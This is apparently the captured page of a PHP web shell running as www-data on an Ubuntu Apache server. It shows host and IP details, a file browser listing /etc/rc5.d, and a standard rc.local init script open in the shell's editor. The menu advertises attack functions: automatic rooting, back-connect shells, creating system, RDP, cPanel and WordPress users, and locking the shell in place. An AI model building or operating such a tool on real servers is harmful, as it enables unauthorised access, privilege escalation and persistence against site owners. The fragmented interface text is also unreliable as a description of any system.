Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.144
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17247 /
etc /
rc5.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
677
B
-rw-r--r--
S01cgmanager
3.48
KB
-rwxr-xr-x
S01rsyslog
2.73
KB
-rwxr-xr-x
S01ubuntu-fan
1.2
KB
-rwxr-xr-x
S02cgproxy
3.28
KB
-rwxr-xr-x
S02cron
2.98
KB
-rwxr-xr-x
S02dbus
2.75
KB
-rwxr-xr-x
S02ssh
3.98
KB
-rwxr-xr-x
S03ondemand
1.54
KB
-rwxr-xr-x
S03rc.local
820
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S03rc.local
#! /bin/sh ### BEGIN INIT INFO # Provides: rc.local # Required-Start: $all # Required-Stop: # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: Run /etc/rc.local if it exist ### END INIT INFO PATH=/sbin:/usr/sbin:/bin:/usr/bin . /lib/init/vars.sh . /lib/lsb/init-functions do_start() { if [ -x /etc/rc.local ]; then [ "$VERBOSE" != no ] && log_begin_msg "Running local boot scripts (/etc/rc.local)" /etc/rc.local ES=$? [ "$VERBOSE" != no ] && log_end_msg $ES return $ES fi } case "$1" in start) do_start ;; restart|reload|force-reload) echo "Error: argument '$1' not supported" >&2 exit 3 ;; stop|status) # No-op exit 0 ;; *) echo "Usage: $0 start|stop" >&2 exit 3 ;; esac
Close